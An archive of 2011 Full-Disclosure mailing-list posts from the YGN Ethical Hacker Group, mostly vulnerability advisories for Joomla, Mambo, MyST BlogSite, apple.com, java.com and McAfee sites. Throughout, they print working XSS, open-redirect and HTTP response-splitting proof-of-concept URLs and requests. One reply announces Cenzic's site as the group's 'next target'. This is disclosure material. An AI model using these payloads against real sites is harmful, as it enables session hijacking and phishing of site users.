Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Joomla! 1.7.0-RC and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities

2011-07-21 Thread YGN Ethical Hacker Group
/components/content-component/article-categories/26-park-site'scriptalert(/XSS/)/script

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-categories/29-fruit-shop-site'scriptalert(/XSS/)/script

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-category-list/20-extensions'scriptalert(/XSS/)/script

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-category-list/24-joomla'scriptalert(/XSS/)/script

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/'scriptalert(/XSS/)/script

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/1-joomla-announcements'scriptalert(/XSS/)/script

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/2-new-joomla-extensions'scriptalert(/XSS/)/script


http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/3-joomla-security-news'scriptalert(/XSS/)/script




6. IMPACT

Attackers can compromise currently logged-in user/administrator
session and impersonate arbitrary user actions available under
/administrator/ functions.


7. SOLUTION

The development of Joomla! 1.6.x has been ceased; there will be no
fixed version for 1.6.x.
Upgrade to Joomla! 1.7.0-stable or higher.


8. VENDOR

Joomla! Developer Team
http://www.joomla.org


9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


10. DISCLOSURE TIME-LINE

2011-07-02: notified vendor
2011-07-19: patched version, 1.7.0, released
2011-07-22: vulnerability disclosed


11. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.5]_cross_site_scripting(XSS)
Previous Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.3]_cross_site_scripting(XSS)
http://yehg.net/lab/#advisories.joomla
Vendor Advisory URL:
http://developer.joomla.org/security/news/357-20110701-xss-vulnerability.html

#yehg [2011-07-22]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Joomla! 1.7.0-RC and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities

2011-07-21 Thread YGN Ethical Hacker Group
/components/content-component/article-categories/26-park-site'scriptalert(/XSS/)/script

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-categories/29-fruit-shop-site'scriptalert(/XSS/)/script

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-category-list/20-extensions'scriptalert(/XSS/)/script

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-category-list/24-joomla'scriptalert(/XSS/)/script

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/'scriptalert(/XSS/)/script

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/1-joomla-announcements'scriptalert(/XSS/)/script

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/2-new-joomla-extensions'scriptalert(/XSS/)/script


http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/3-joomla-security-news'scriptalert(/XSS/)/script




6. IMPACT

Attackers can compromise currently logged-in user/administrator
session and impersonate arbitrary user actions available under
/administrator/ functions.


7. SOLUTION

The development of Joomla! 1.6.x has been ceased; there will be no
fixed version for 1.6.x.
Upgrade to Joomla! 1.7.0-stable or higher.


8. VENDOR

Joomla! Developer Team
http://www.joomla.org


9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


10. DISCLOSURE TIME-LINE

2011-07-02: notified vendor
2011-07-19: patched version, 1.7.0-stable, released
2011-07-22: vulnerability disclosed


11. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.7.0-rc]_cross_site_scripting(XSS)
Previous Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.3]_cross_site_scripting(XSS)
http://yehg.net/lab/#advisories.joomla
Vendor Advisory URL:
http://developer.joomla.org/security/news/357-20110701-xss-vulnerability.html

#yehg [2011-07-22]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] MyST BlogSite | Multiple Vulnerabilities

2011-07-16 Thread YGN Ethical Hacker Group
===
MyST BlogSite | Multiple Vulnerabilities
===


1. VULNERABILITY DESCRIPTION


-- Issue Title: Arbitrary URL Redirect
Component: MyST BlogSite ClickDirector

Ref: OWASP - Top 10 - 2010 - A10
Ref-Link: 
https://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards

Proof-Of-Concept:
http://blogsite.com/public/click/~sites/attacker.in/malware_exists_in_this_page/
http://blog.cenzic.com/public/click/~sites/attacker.in/malware_exists_in_this_page/
[FIXED]


-- Issue Title: Information Leakage
Ref: WASC-13
Ref-Link: http://projects.webappsec.org/w/page/13246936/Information-Leakage

This could be used to brute force (http://blogsite.com/login)

Proof-Of-Concept:
http://blogsite.com/public/mostl/1
http://blogsite.com/public/mostl/2
http://blogsite.com/public/my-account/1
http://blogsite.com/public/my-account/2
http://blogsite.com/public/object/1
http://blogsite.com/public/object/2
http://blogsite.com/public/object/3


-- Issue Title: Arbitrary Text Insertion

This could be used to deliver defamatory message to unaware users.

Proof-of-Concept:
http://blogsite.com/public/mostl-action/1?action=Browsetext=This%20blog%20was%200wned!



2. VENDOR

MyST Technology Partners, Inc.
http://myst-technology.com/


4. DISCLOSURE TIME-LINE

2011-04-17: reported vendor
2011-07-16: vulnerability found unfixed
2011-07-16: vulnerability disclosed 


5. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[MyST_BlogSite]_vulnerabilities_2011-07

#yehg [2011-07-16]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Vulnerabilities in developer.apple.com

2011-07-01 Thread YGN Ethical Hacker Group
Vulnerabilities via URL Redirector in developer.apple.com



1. VULNERABILITY DESCRIPTION

Arbitrary URL Redirect
==

POC (Browsers: All)
https://developer.apple.com/membercenter/urlRedirect.action?fullURL=http://attacker.in/malware_exists_in_this_page

Issue References:
OWASP Top 10 A10 -
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE 601 -  http://cwe.mitre.org/data/definitions/601.html


Cross Site Scripting(XSS) Via Arbitrary URL Redirect


POC (Browsers: Safari, Opera):
https://developer.apple.com/membercenter/urlRedirect.action?fullURL=data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgiQ3Jvc3MgU2l0ZSBTY3JpcHRpbmcgRGVtbyBieVxuXG55ZWhnLm5ldFxuIik8L3NjcmlwdD4%3D

Issue References:
OWASP Top 10 A2 - https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE 79 - http://cwe.mitre.org/data/definitions/79.html


HTTP Response Splitting(HRS) Via Arbitrary URL Redirect


https://developer.apple.com/membercenter/urlRedirect.action?fullURL=http://attacker.in%0D%0ALocation%3A%0D%0AContent-Type%3A%20text%2Fhtml%0D%0AContent-Length%3A%2089%0D%0A%0D%0A%3Chtml%3E%3Ctitle%3EThis%20page%20was%20hacked%3F%3C%2Ftitle%3E%3Ch1%3EThis%20page%20was%20hacked%3F%20-%20Not%20Really%3C%2Fh1%3E%3C!--

Issue References:
CWE 113 - http://cwe.mitre.org/data/definitions/113.html


Demo:
http://yehg.net/lab/pr0js/training/view/misc/Vulnerabilities%20Via%20Redirectors%20-%20developer.apple.com/


2. VENDOR

Apple Inc
http://www.apple.com


3. VULNERABILITY STATUS

FIXED


4. DISCLOSURE TIME-LINE

2011-04-25: reported vendor
2011-04-27: vendor replied Thank you for forwarding this issue to us.
We take any report of a potential security issue
very seriously.
2011-06-29: vendor replied vulnerability was fixed
2011-07-01: vulnerability was disclosed


5. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/sites/developer.apple.com/[apple-developer]_ur_xss_hrs


#yehg [2011-07-01]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] smallftpd = 1.0.3-fix | Connection Saturation Remote Denial of Service Vulnerability

2011-06-29 Thread YGN Ethical Hacker Group
smallftpd = 1.0.3-fix  | Connection Saturation Remote Denial of
Service Vulnerability




1. OVERVIEW

The smallftpd FTP server is found to be vulnerable to denial of
service in handling multiple connection requests regardless of its
maximum connection settings. Upon successful DoS exploit, the
smallftpd will crash or reject new FTP login requests.


2. BACKGROUND

The smallftpd FTP server isis a small and simple muli-threaded ftp
server for windows.


3. VERSIONS AFFECTED

1.0.3-fix and earlier


4. PROOF-OF-CONCEPT/EXPLOIT

http://dev.metasploit.com/redmine/attachments/1330/smallftpd103fix_saturation.rb
http://www.exploit-db.com/download/17455


5. SOLUTION

The vendor has discontinued this product and therefore has no patch or
upgrade that mitigates this problem. It is recommended that an
alternate software package be used in its place.


6. VENDOR

Arnaud Mary


7. CREDIT

This vulnerability was discovered by Myo Soe, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


8. REFERENCES

Original Advisory URL:
http://core.yehg.net/lab/pr0js/advisories/smallftpd_103-fix_saturation_dos
SmallFTPD Home Page: http://smallftpd.sourceforge.net/
SmallFTPD Download Stat:
http://sourceforge.net/project/stats/?group_id=104723ugn=smallftpdtype=mode=alltime

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities

2011-06-28 Thread YGN Ethical Hacker Group
Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities



1. OVERVIEW

Joomla! 1.6.3 and lower are vulnerable to multiple Cross Site Scripting issues.


2. BACKGROUND

Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
model–view–controller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.


3. VULNERABILITY DESCRIPTION

Several parameters (QueryString, option, searchword) in Joomla! Core
components (com_content, com_contact, com_newsfeeds, com_search) are
not properly sanitized upon submission to the /index.php url, which
allows attacker to conduct Cross Site Scripting attack. This may allow
an attacker to create a specially crafted URL that would execute
arbitrary script code in a victim's browser.


4. VERSION AFFECTED

1.6.3 and lower


5. PROOF-OF-CONCEPT/EXPLOIT


component: com_contact , parameter: QueryString (Browser: All)
===

http://attacker.in/joomla163_noseo/index.php?option=com_contactview=categorycatid=26id=36Itemid=-1;scriptalert(/XSS/)/script


component:com_content , parameter:  QueryString (Browser: All)
===

http://attacker.in/joomla163_noseo/index.php?option=com_contentview=categoryid=19Itemid=260limit=10filter_order_Dir=limitstart=filter_order=scriptalert(/XSS/)/script


component: com_newsfeeds , parameter: QueryString (Browser: All)
=

http://attacker.in/joomla163_noseo/index.php?option=com_newsfeedsview=categoryid=17whateverehere=;scriptalert(/XSS/)/scriptItemid=253limit=10filter_order_Dir=ASCfilter_order=ordering


parameter: option (Browser: All)


http://attacker.in/joomla163_noseo/index.php?option=;scriptalert(/XSS/)/scripttask=reset.request


component: com_search, parameter: searchword (Browser: IE, Konqueror)
=

[REQUEST]
POST /joomla163/index.php HTTP/1.1
Referer: http://attacker.in/joomla163/
User-Agent: Konqueror/4.5
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: attacker.in
Accept-Encoding: gzip, deflate
Content-Length: 125

option=com_searchsearchword='%2522%253C%252Fscript%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253Etask=search
[/REQUEST]

This searchword XSS was identified via source code:
http://yehg.net/lab/pr0js/advisories/joomla/core/1.6.3/xss/XSS%20%5bMode=SEO,NON-SEO%5d/(searchword)_xss_vuln_code_portion.jpg


6. IMPACT

Attackers can compromise currently logged-in user/administrator
session and impersonate arbitrary user actions available under
/administrator/ functions.


7. SOLUTION

Upgrade to Joomla! 1.6.4 or higher


8. VENDOR

Joomla! Developer Team
http://www.joomla.org


9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


10. DISCLOSURE TIME-LINE

2011-05-26: notified vendor
2011-06-28: vendor released fix
2011-06-28: vulnerability disclosed


11. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.3]_cross_site_scripting(XSS)
Vendor Advisory URL:
http://developer.joomla.org/security/news/352-20110604-xss-vulnerability.html
XSS FAQ: http://www.cgisecurity.com/xss-faq.html
OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE-79: http://cwe.mitre.org/data/definitions/79.html


#yehg [2011-06-28]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities

2011-06-27 Thread YGN Ethical Hacker Group
Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities



1. OVERVIEW

Mambo CMS 4.6.5 and lower versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

Mambo is a full-featured, award-winning content management system that
can be used for everything from simple websites to complex corporate
applications. It is used all over the world to power government
portals, corporate intranets and extranets, ecommerce sites, nonprofit
outreach, schools, church, and community sites. Mambo's power in
simplicity also makes it the CMS of choice for many small businesses
and personal sites.


3. VULNERABILITY DESCRIPTION

Multiple parameters (task, menu, menutype, zorder, search, client,
section) are not properly sanitized, which allows attacker to conduct
Cross Site Scripting attack. This may allow an attacker to create a
specially crafted URL that would execute arbitrary script code in a
victim's browser.


4. VERSIONS AFFECTED

Tested on Mambo CMS 4.6.5 (current as of 2011-06-27)


5. PROOF-OF-CONCEPT/EXPLOIT

FrontEnd
==

param: task

http://attacker.in/mambo/index.php?option=com_contenttask=%22%20style=width:1000px;height:1000px;top:0;left:0;position:absolute%20onmouseover=alert%28/XSS/%29%20id=3Itemid=32


BackEnd
==

param: menu

http://attacker.in/mambo/administrator/index2.php?option=com_menumanagertask=edithidemainmenu=1menu=Move+your+mouse+here%22%20style=position:absolute;width:1000px;height:1000px;top:0;left:0;%20onmouseover=alert%28/XSS/%29%20


param: menutype [hidden form xss, esp in IE 6,7 and older versions of Firefox]

http://attacker.in/mambo/administrator/index2.php?option=com_menusmenutype=xss%20style%3dx%3aexpression(alert(/XSS/))%20X
http://attacker.in/mambo/administrator/index2.php?option=com_menusmenutype=xss%20%20%20style=background-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;%20x=%20X


param: zorder

http://attacker.in/mambo/administrator/index2.php?limit=10order%5b%5d=11boxchecked=0toggle=onsearch=simple_searchtask=limitstart=0cid%5b%5d=onzorder=c.ordering+DESC;scriptalert(/XSS/)/scriptfilter_authorid=62hidemainmenu=0option=com_typedcontent


param: search

http://attacker.in/mambo/administrator/index2.php?limit=10boxchecked=0toggle=onsearch=xss;scriptalert(/XSS/)/scripttask=limitstart=0hidemainmenu=0option=com_comment


param: client

http://attacker.in/mambo/administrator/index2.php?option=com_modulesclient=%27%22%20onmouseover=alert%28/XSS/%29%20a=%22%27
NB: mouseover on banner link


param: section  [hidden form xss, esp in IE 6,7 and older versions of Firefox]

http://attacker.in/mambo/administrator/index2.php?option=com_categoriessection=com_weblinks%20style%3dx%3aexpression(alert(/XSS/))%20Xtask=editAhidemainmenu=1id=2

http://attacker.in/mambo/administrator/index2.php?option=com_categoriessection=com_weblinks%20style%3d-moz-binding:url(http://www.businessinfo.co.uk/labs/xbl/xbl.xml%23xss)%20Xtask=editAhidemainmenu=1id=2

http://attacker.in/mambo/administrator/index2.php?option=com_categoriessection=com_weblinks%20%20style=background-image:url('javascript:alert(0)');width:1000px;height:1000px;display:block;%20x=%20Xtask=editAhidemainmenu=1id=2

http://attacker.in/mambo/administrator/index2.php?option=com_categoriessection=com_weblinks%20%20style=background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%20x=%20Xtask=editAhidemainmenu=1id=2


6. SOLUTION

The vendor seems to discontinue the development. It is recommended to
use another CMS in active development.


7. VENDOR

Mambo CMS Development Team
http://mambo-developer.org


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-11-31: notified vendor through bug tracker
2011-06-27: no patched version released up to date
2011-06-27: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[mambo4.6.x]_cross_site_scripting
Mambo CMS: http://mambo-code.org/gf/download/frsrelease/388/791/MamboV4.6.5.zip


#yehg [2011-06-27]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities

2011-06-27 Thread YGN Ethical Hacker Group
 Did you really test a code base that is a version of an old Joomla base
No

 or did you look at the code, and test old Joomla bugs against it?
No


The XSS results are from purely blackbox scan on Mambo 4.6.5.


Joomla (Joomla! 1.0.0) was released on September 16, 2005. It was a
re-branded release of Mambo 4.5.2.3 which, itself, was combined with
other bug and moderate-level security fixes.

From that statement, it can be assumed that the code bases of Mambo
4.5.2.4 and higher  are different from those of Joomla! 1.1 and
higher.  As you can say so, we may sync old Joomla! 1.x bugs in Mambo
4.6.x. But it may be time-consuming to analyze the code changes and
validity of bugs in each version of both CMS.


https://secure.wikimedia.org/wikipedia/en/wiki/Joomla
http://www.joomla.org/announcements/general-news/154-introducing-joomla-10.html



 I thought these were found in Joomla ages ago?

No.



 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] java.com | Arbitrary URL Redirect Vulnerability

2011-04-23 Thread YGN Ethical Hacker Group
==
java.com | Arbitrary URL Redirect Vulnerability
==


1. VULNERABILITY DESCRIPTION

- Arbitrary URL Redirect
   http://java.com/inc/BrowserRedirect1.jsp?locale=enhost=attacker.in

Demo: 
http://yehg.net/lab/pr0js/training/view/misc/java.com_Arbitrary_URL_Redirect/


2. VENDOR

Oracle Inc
http://www.oracle.com


3. VULNERABILITY STATUS

FIXED


4. DISCLOSURE TIME-LINE

2011-04-19: reported vendor
2011-04-23: vendor fixed the issue
2011-04-24: vulnerability disclosed


5. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/sites/java.com/[java.com]_url_redirection
OWASP-Top-10_2010-A10:
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
SANS-TOP-23: http://www.sans.org/top25-software-errors/
CWE-601: http://cwe.mitre.org/data/definitions/601.html

#yehg [2011-04-24]


-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread YGN Ethical Hacker Group
According to xssed.com,  there are two remaining XSS issues:

https://kb.mcafee.com/corporate/index?page=contentid=;; alert(1); //
https://kc.mcafee.com/corporate/index?page=contentid=;; alert(1); //


You guys know our disclosed issues are very simple and can easily be
found through viewing HTML/JS source codes and simple Google Hacking
(http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).

However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
http://www.cenzic.com/company/management/khera/,  according to Network
World News editor - Ellen Messmer.  Thus, the next target is Cenzic
web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
is.


-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar (Burma)
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd




On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes pa...@ximen.es wrote:
 FIY

 http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-Security-Holes


 Pablo Ximenes
 http://ximen.es/
 http://twitter.com/pabloximenes




 2011/3/28 Pablo Ximenes pa...@ximen.es:
 blog post about this: http://ximen.es/?p=469

 Please, don't throw stones at me.

 []'s


 Pablo Ximenes
 http://ximen.es/
 http://twitter.com/pabloximenes



 2011/3/27 YGN Ethical Hacker Group li...@yehg.net

 Vulnerabilities in *McAfee.com


 1. VULNERABILITY DESCRIPTION

 - Cross Site Scripting

 http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')

 - Information Disclosure  Internal Hostname:
    http://www.mcafee.com/js/omniture/omniture_profile.js

    ($ ruby host-extract.rb -a
 http://www.mcafee.com/js/omniture/omniture_profile.js)

 - Information Disclosure  Source Code Disclosure:


  view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp

  view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp

  view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
        view-source:http://download.mcafee.com/clinic/Includes/common.asp
        view-source:http://download.mcafee.com/updates/upgrade_patches.asp

  view-source:http://download.mcafee.com/updates/common/dat_common.asp
        view-source:http://download.mcafee.com/updates/updates.asp
        view-source:http://download.mcafee.com/updates/superDat.asp
        view-source:http://download.mcafee.com/eval/evaluate2.asp
        view-source:http://download.mcafee.com/common/ssi/conditionals.asp

  view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
        view-source:http://download.mcafee.com/common/ssi/variables.asp

  view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
        view-source:http://download.mcafee.com/common/ssi/errHandler.asp
        view-source:http://download.mcafee.com/common/ssi/common_subs.asp

  view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
        view-source:http://download.mcafee.com/us/bannerAd.asp

  view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp


 2. RECOMMENDATION

 - Fully utilize Mcafee FoundStone Experts
 - Use outbound monitoring of traffic to detect potential information
 leakage


 3. VENDOR

 McAfee Inc
 http://www.mcafee.com


 4. DISCLOSURE TIME-LINE

 2011-02-10: reported vendor
 2011-02-12: vendor replied we are working to resolve the issue as
 quickly as possible
 2011-03-27: vulnerability found to be unfixed completely
 2011-03-27: vulnerability disclosed


 5. REFERENCES

 Original Advisory URL:

 http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
 Former Disclosure, 2008:
 http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
 Former Disclosure, 2009:

 http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
 Former Disclosure, 2010:

 http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
 host-extract: http://code.google.com/p/host-extract/
 Demo: http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
 xssed: http://www.xssed.com/search?key=mcafee.com
 Lessont Learn:
 http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach

 #yehg [2011-03-27]

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread YGN Ethical Hacker Group
Thanks for all your inputs and discussions.

We believe keeping these information as secret is unethical and irresponsible.



For those who think/criticize we're unethical /illegal,

there is so-called Passive Scanning technique in security testing.

Passive scanning (a.k.a Passive Reconnaissance) is basically examining
web site work flows and its involved source codes for identifying
vulnerabilities without ever attacking the target itself.

Contrary to what most of people think, passive scanning allows
everyone to audit any web sites without breaking the laws and without
alarming firewalls in-front.

Basically it starts as:

1. Do Google Hacking and look for potential information leakage. (Most
of the tools allow you to add your own GH Dorks).

2. Browse the target web site with a scanner that has passive
vulnerability scanning capability -  ratproxy, zaproxy, webscarab,
fiddler+watcher,/ burp-pro or you name it
Also use meta data extraction tools. And look for potential
information leakage  others

3. Examine all contents of JavaScript  decompiled Flash/Silverlight/Java Applet

4. Look for common vulnerable points and mis-uses
e.g., for JS files, examine calls like document.URLUnencoded,
document.referer, document.location, window.location,
location.href,document.URL ...etc


Passive scan is just a small subset of assessment realm. Findings are
very limited.

Our recent disclosure of Plesk open redirect flaw was a result from
purely passive scan on a static HTML web site -
http://yehg.net/lab/pr0js/advisories/%5Bplesk_7.0-8.2%5D_open_url_redirection

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-27 Thread YGN Ethical Hacker Group
Vulnerabilities in *McAfee.com


1. VULNERABILITY DESCRIPTION

- Cross Site Scripting
   
http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')

- Information Disclosure  Internal Hostname:
http://www.mcafee.com/js/omniture/omniture_profile.js   

($ ruby host-extract.rb -a
http://www.mcafee.com/js/omniture/omniture_profile.js)

- Information Disclosure  Source Code Disclosure:


view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp

view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp

view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
view-source:http://download.mcafee.com/clinic/Includes/common.asp
view-source:http://download.mcafee.com/updates/upgrade_patches.asp
view-source:http://download.mcafee.com/updates/common/dat_common.asp
view-source:http://download.mcafee.com/updates/updates.asp
view-source:http://download.mcafee.com/updates/superDat.asp 
view-source:http://download.mcafee.com/eval/evaluate2.asp
view-source:http://download.mcafee.com/common/ssi/conditionals.asp
view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
view-source:http://download.mcafee.com/common/ssi/variables.asp

view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
view-source:http://download.mcafee.com/common/ssi/errHandler.asp
view-source:http://download.mcafee.com/common/ssi/common_subs.asp

view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
view-source:http://download.mcafee.com/us/bannerAd.asp

view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp


2. RECOMMENDATION

- Fully utilize Mcafee FoundStone Experts
- Use outbound monitoring of traffic to detect potential information leakage


3. VENDOR

McAfee Inc
http://www.mcafee.com


4. DISCLOSURE TIME-LINE

2011-02-10: reported vendor
2011-02-12: vendor replied we are working to resolve the issue as
quickly as possible
2011-03-27: vulnerability found to be unfixed completely
2011-03-27: vulnerability disclosed


5. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
Former Disclosure, 2008:
http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
Former Disclosure, 2009:
http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
Former Disclosure, 2010:
http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
host-extract: http://code.google.com/p/host-extract/
Demo: http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
xssed: http://www.xssed.com/search?key=mcafee.com
Lessont Learn: 
http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach

#yehg [2011-03-27]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Tool Update Announcement WhatWeb v0.4.6 Released. Now with over 900 plugins!

2011-03-26 Thread YGN Ethical Hacker Group
Version 0.4.6 of WhatWeb is now released. Enjoy scanning the web.


.$$$     $.                                   .$$$     $.
     $$. .$$$  $$$ .$$.  .$$.      $$. .$$$. .$$.
$ $$     $$$ $ $$  $$$ $ $$. $ $$ $ $$     $$$ $ $$   $$ $ $$.
$ `$     $$$ $ `$  $$$ $ `$  $$$ $$' $ `$ `$$ $ `$     $$$ $ `$      $ `$  $$$'
$. $     $$$ $. $$ $. $$ `$  $. $  :' $. $     $$$ $.    $. $.
$::$  .  $$$ $::$  $$$ $::$  $$$     $::$     $::$  .  $$$ $::$      $::$  
$;;$ $$$ $$$ $;;$  $$$ $;;$  $$$     $;;$     $;;$ $$$ $$$ $;;$      $;;$  
$$ $   $$$   $$$          $$ $ $ $'



Readme for WhatWeb - Next generation web scanner.
By urbanadventurer aka Andrew Horton from Security-Assessment.com
Version: 0.4.6. March 25th, 2011
License: GPLv2



This product is subject to the terms detailed in the license
agreement. For more information about
WhatWeb visit:

       Homepage:       http://www.morningstarsecurity.com/research/whatweb
       Wiki:           https://github.com/urbanadventurer/WhatWeb/wiki/

